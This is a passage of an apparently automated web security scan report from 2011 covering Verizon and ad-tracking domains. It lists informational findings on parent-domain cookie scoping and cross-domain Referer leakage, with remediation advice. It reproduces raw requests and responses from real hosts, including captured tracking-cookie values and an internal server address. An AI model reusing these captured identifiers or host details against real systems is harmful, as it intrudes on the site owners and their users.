
Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

1621610-B22941263=0|0|0|0|0|22946267|22946266|-1; domain=.ru4.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.60. http://sales.liveperson.net/hc/2329305/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/2329305/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

LivePersonID=-5110247826455-1315261011:0; expires=Tue, 04-Sep-2012 22:16:51 GMT; path=/hc/2329305; domain=.liveperson.net
LivePersonID=-5110247826455-1315261011:-1:-1:-1:-1; expires=Tue, 04-Sep-2012 22:16:51 GMT; path=/hc/2329305; domain=.liveperson.net

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.61. http://sales.liveperson.net/hc/2329305/cmd/url/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/2329305/cmd/url/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

LivePersonID=-5110247826455-1315261003:-1:1315261074:-1:-1; expires=Tue, 04-Sep-2012 22:23:18 GMT; path=/hc/2329305; domain=.liveperson.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.62. http://sales.liveperson.net/hc/44153975/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/44153975/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

LivePersonID=-546022977410-1315260925:-1:-1:-1:-1; expires=Tue, 04-Sep-2012 22:15:28 GMT; path=/hc/44153975; domain=.liveperson.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/44153975/?lpCallId=588965299046-84969359642&protV=20&lpjson=1&site=44153975&cmd=mTagInPage&page=http%3A//www.verizonwireless.com/b2c/promotion/specialoffers.jsp&id=6680413031&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-generic-consumer-english&activePlugin=none&cobrowse=true&cookie=GLOBALID%3DtWRJzfV%252FzyamDVoURNGmO7smtgitROzrsjFa48jF8jyYMlJxx5Bllp8fvpJxcQO4%3B%20%20mbox%3Dcheck%23true%231315278966%7Csession%231315278871714-190238%231315280766%7CPC%231315278871714-190238.19%231316488506%3B%20gnVersion%3D2011Jul31030844%3B%20CP%3Dnull* HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/promotion/specialoffers.jsp
Cookie: HumanClickKEY=4768142437206261315; LivePersonID=-546022977410-1315260925:-1:-1:-1:-1; HumanClickSiteContainerID_44153975=Secondary3; LivePersonID=LP i=546022977410,d=1312768968; HumanClickACTIVE=1315260923432

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:15:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_44153975=Secondary3; path=/hc/44153975
Set-Cookie: LivePersonID=-546022977410-1315260925:-1:-1:-1:-1; expires=Tue, 04-Sep-2012 22:15:28 GMT; path=/hc/44153975; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 05 Sep 2011 22:15:28 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 187

lpConnLib.Process({"ResultSet": {"lpCallId":"588965299046-84969359642","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});

14.63. http://search.verizon.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://search.verizon.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1stsp=9A1D507944409CB9; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.64. http://servedby.flashtalking.com/segment/modify/adg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://servedby.flashtalking.com
Path:	/segment/modify/adg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

flashtalkingad1="GUID=13153E27A6C6C8|segment=(adg-t:1343)";Path=/;Domain=.flashtalking.com;Expires=Wed, 04-Sep-13 22:14:45 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.65. https://signin.verizon.com/sso/VOLPortalLogin previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://signin.verizon.com
Path:	/sso/VOLPortalLogin

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

lob=consumer; domain=.verizon.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sso/VOLPortalLogin HTTP/1.1
Host: signin.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.66. http://syndicate.verizon.net/ads/regionlocator.ashx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://syndicate.verizon.net
Path:	/ads/regionlocator.ashx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; domain=verizon.net; expires=Tue, 06-Sep-2011 22:18:13 GMT; path=/
POPRefid=refid=&refresh=y&reftrytime=0&refnum=; domain=verizon.net; expires=Tue, 06-Sep-2011 22:18:13 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.67. http://tags.bluekai.com/site/4357 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/4357

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

bk=ht88uCDC+h5Mq/0A; expires=Sat, 03-Mar-2012 22:15:21 GMT; path=/; domain=.bluekai.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.68. http://tap.tapad.com/audience/pxl.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tap.tapad.com
Path:	/audience/pxl.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TapAd_DID=e8460635-57b3-4d5a-a2f2-35905a4b8d5e;Path=/;Domain=.tapad.com;Expires=Fri, 04-Nov-2011 22:14:40 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.69. http://webmail.verizon.com/signin/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webmail.verizon.com
Path:	/signin/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

lob=webmail; Domain=.verizon.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.70. http://webmail.verizon.net/signin/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webmail.verizon.net
Path:	/signin/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

lob=webmail; Domain=.verizon.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.71. http://webmail.verizon.net/signin/Login.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webmail.verizon.net
Path:	/signin/Login.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

lob=webmail; Domain=.verizon.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.72. http://whitefence.112.2o7.net/b/ss/pcwhitefencecom/1/H.21/s59195406346116 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://whitefence.112.2o7.net
Path:	/b/ss/pcwhitefencecom/1/H.21/s59195406346116

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_x7Flxxgfx7Bjijaljlx60b=[CS]v4|2732A76805160411-600001A3402E5C46|4E654ED0[CE]; Expires=Sat, 3 Sep 2016 22:36:00 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/pcwhitefencecom/1/H.21/s59195406346116 HTTP/1.1
Host: whitefence.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.73. http://www.facebook.com/dialog/feed previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/dialog/feed

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

locale=en_US; expires=Mon, 12-Sep-2011 22:36:10 GMT; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdialog%2Ffeed; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dialog/feed HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.74. http://www.facebook.com/profile.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/profile.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php; path=/; domain=.facebook.com; httponly
next_path=%2Fprofile.php; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /profile.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/login.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fprofile.php; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.151.33
Connection: close
Date: Mon, 05 Sep 2011 22:36:10 GMT
Content-Length: 0

14.75. http://www.verizonwireless.com/b2c/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/index.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; domain=.verizonwireless.com; expires=Tuesday, 04-Sep-2012 22:15:38 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.76. http://www.verizonwireless.com/b2c/store/controller previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/store/controller

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

CARTVIEW=FALSE; domain=.verizonwireless.com; expires=Monday, 05-Sep-2011 22:40:58 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.77. http://www.verizonwireless.com/b2c/vzwfly previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/vzwfly

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CARTVIEW=FALSE; domain=.verizonwireless.com; expires=Monday, 05-Sep-2011 22:40:58 GMT; path=/
ZIPCODE=10010; domain=.verizonwireless.com; expires=Sunday, 04-Dec-2011 22:20:58 GMT; path=/
CITY=New York; domain=.verizonwireless.com; expires=Sunday, 04-Dec-2011 22:20:58 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.78. http://www.youtube.com/results previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/results

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

GEO=797cb795181fd5a70728e4cd351d4ac7cwsAAAAzVVMyF3tqTmVPFQ==; path=/; domain=.youtube.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /results HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.79. http://www22.verizon.com/content/commontemplates/validlogin.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/content/commontemplates/validlogin.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ak-sf=false; expires=Mon, 05-Sep-2011 22:29:10 GMT; path=/content/; domain=verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.80. http://www22.verizon.com/content/verizonglobalhome/Intermediate.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/content/verizonglobalhome/Intermediate.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ak-sf=false; expires=Mon, 05-Sep-2011 22:24:23 GMT; path=/content/; domain=verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.81. http://www22.verizon.com/content/verizonglobalhome/setValues.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/content/verizonglobalhome/setValues.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ak-sf=false; expires=Mon, 05-Sep-2011 22:21:57 GMT; path=/content/; domain=verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.82. http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/globalalert.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/onecms/vzcareers/ak-cached/4h/includes/javascript/globalalert.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

dtCookie=8C98328CB529EE605B41B254E42B3E4A; Path=/; Domain=.verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.83. http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/interactivemaps-min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/onecms/vzcareers/ak-cached/4h/includes/javascript/interactivemaps-min.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

dtCookie=F0B2C87868F87FC6A655B69C67AB426A; Path=/; Domain=.verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.84. http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/jquery.autocomplete.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/onecms/vzcareers/ak-cached/4h/includes/javascript/jquery.autocomplete.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

dtCookie=EE5AD3E136DED5D5213A809D2C43BE81; Path=/; Domain=.verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.85. http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/jquery.fancybox-1.3.4.pack_blkbg.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/onecms/vzcareers/ak-cached/4h/includes/javascript/jquery.fancybox-1.3.4.pack_blkbg.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

dtCookie=AD6328FE536A22C20265D4EAF77869AB; Path=/; Domain=.verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.86. http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/resizeFlashContent.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/onecms/vzcareers/ak-cached/4h/includes/javascript/resizeFlashContent.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

dtCookie=2A590482738580C9C42A61F79126E809; Path=/; Domain=.verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.87. http://www22.verizon.com/onecms/vzcareers/includes/javascript/oo_engine.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/onecms/vzcareers/includes/javascript/oo_engine.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

dtCookie=A528D23E157B5DAF5094EF7EAA13842D; Path=/; Domain=.verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.88. https://www22.verizon.com/FORYOURHOME/GOFLOW/employeeflow/EmpDiscountProgram.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/FORYOURHOME/GOFLOW/employeeflow/EmpDiscountProgram.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

EOrdering=AffinityCaptcha=NES6zYkqZVIXZHz3xATrXzO2Q%3d%3d; domain=.verizon.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.89. https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; domain=.verizon.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.90. https://www22.verizon.com/ForYourHome/GoFlow/MyVerizonNew/ACSLogin.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/ForYourHome/GoFlow/MyVerizonNew/ACSLogin.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

EOrdering=AffinityCaptcha=NES6zYkqZVIXZHz3xATrXzO2Q%3d%3d&STEP133=NESJBAz%2b%2bFRFcSze8KcWPLg9w%3d%3d&PROJNORTH-CLIENT=; domain=.verizon.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ForYourHome/GoFlow/MyVerizonNew/ACSLogin.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.91. https://www22.verizon.com/ForYourHome/Goflow/MyVerizon/OneClick/MyVerizonAsync.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/ForYourHome/Goflow/MyVerizon/OneClick/MyVerizonAsync.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ak-sf=false; expires=Mon, 05-Sep-2011 22:47:02 GMT; path=/foryourhome/; domain=verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.92. https://www22.verizon.com/ForYourSmallBiz/GoFlow/NationalBundles/BundleQualify.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/ForYourSmallBiz/GoFlow/NationalBundles/BundleQualify.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; domain=.verizon.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.93. https://www22.verizon.com/content/VerizonGlobalHome/validlogin.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/content/VerizonGlobalHome/validlogin.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ak-sf=false; expires=Mon, 05-Sep-2011 22:24:46 GMT; path=/content/; domain=verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.94. https://www22.verizon.com/includes/cache/15/blank.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/includes/cache/15/blank.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ak-sf=false; expires=Mon, 05-Sep-2011 22:27:04 GMT; path=/includes/; domain=verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.95. https://www22.verizon.com/includes/cache/getwb31.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/includes/cache/getwb31.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ak-sf=false; expires=Mon, 05-Sep-2011 22:28:18 GMT; path=/includes/; domain=verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.96. https://www22.verizon.com/includes/javascript/commonjs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/includes/javascript/commonjs/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ak-sf=false; expires=Mon, 05-Sep-2011 22:26:41 GMT; path=/includes/; domain=verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.97. https://www22.verizon.com/includes/javascript/hbx.js/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/includes/javascript/hbx.js/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ak-sf=false; expires=Mon, 05-Sep-2011 22:26:42 GMT; path=/includes/; domain=verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.98. https://www22.verizon.com/includes/javascript/hbx_custom.js/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/includes/javascript/hbx_custom.js/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ak-sf=false; expires=Mon, 05-Sep-2011 22:26:41 GMT; path=/includes/; domain=verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.99. https://www22.verizon.com/includes/javascript/sitewise.js/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/includes/javascript/sitewise.js/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ak-sf=false; expires=Mon, 05-Sep-2011 22:26:59 GMT; path=/includes/; domain=verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.100. https://www22.verizon.com/vztracker/vzTracker.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/vztracker/vzTracker.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ak-sf=false; expires=Mon, 05-Sep-2011 22:29:19 GMT; path=/vztracker/; domain=verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

15. Cross-domain Referer leakage previous next
There are 49 instances of this issue:

http://ad.doubleclick.net/adi/N2870.vznbiz/B3160296
http://ad.doubleclick.net/adj/syn.verizon/news_read_atf
http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb
http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb
http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_news_ins_federatedMediaBlog
http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_ovrvw_inst_businessNews
http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBProtal_portlet_hiddenNews_articleDetails_quicklinks
http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBProtal_portlet_hiddenNews_articleDetails_supportHelp
http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/VerizonDiscountProgram_2
http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_10
http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_11
http://cm.g.doubleclick.net/pixel
http://cm.g.doubleclick.net/pixel
http://cm.g.doubleclick.net/pixel
https://enterprisecenter.verizon.com/enterprisesolutions/default/signIn.do
http://fls.doubleclick.net/activityi
http://fls.doubleclick.net/activityi
http://forums.verizon.com/vrzn/restapi/vc/
http://media.verizon.com/media/scripts/widget.ashx
http://oascentral.verizononline.com/RealMedia/ads/adstream_mjx.ads/business2.vz.net/out/homepage/139299456@Top1,x13
http://oascentral.verizononline.com/RealMedia/ads/adstream_mjx.ads/business2.vz.net/out/news/189057460@Top1,x13
http://oascentral.verizononline.com/RealMedia/ads/adstream_mjx.ads/business2.vz.net/out/travelportlet/113860497@Top1
http://oascentral.verizononline.com/RealMedia/ads/adstream_mjx.ads/my.verizon.com/homepage/newuser/150843310@Top1,Bottom,Bottom1,BottomRight
http://oascentral.verizononline.com/RealMedia/ads/adstream_mjx.ads/shopvz.net/homepage/109403470@Right,Right1
http://oascentral.verizononline.com/RealMedia/ads/adstream_mjx.ads/vznewsroom.net/homepage.html/122796748@Top1,x20,x21,x37,x38,x48,x49,x50,Right1
http://s7.addthis.com/js/250/addthis_widget.js
http://search.verizon.com/
http://search.verizon.com/
http://search.verizon.com/
http://smallbusiness.verizon.com/scripts/combined.aspx
http://webmail.verizon.net/signin/Login.jsp
http://webmail.verizonemail.net/webmail/servlet/HttpNimletDriver
http://www.connecttoverizon.com/loginFailed.html
http://www.google.com/search
http://www.google.com/url
http://www.google.com/url
http://www.google.com/url
http://www.google.com/url
http://www.google.com/url
http://www.verizonbusiness.com/(en)/topnav.xml
http://www.verizonbusiness.com/Medium/topnav.xml
http://www.verizonbusiness.com/topnav.xml
http://www.verizonwireless.com/b2c/index.html
http://www.verizonwireless.com/b2c/store/controller
http://www22.verizon.com/
http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/ak-cached/origin/SupportService.aspx
http://www22.verizon.com/residential/fiostv
https://www22.verizon.com/
https://www22.verizon.com/ForYourHome/VZRepair/vziha/js/jslib.axd

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

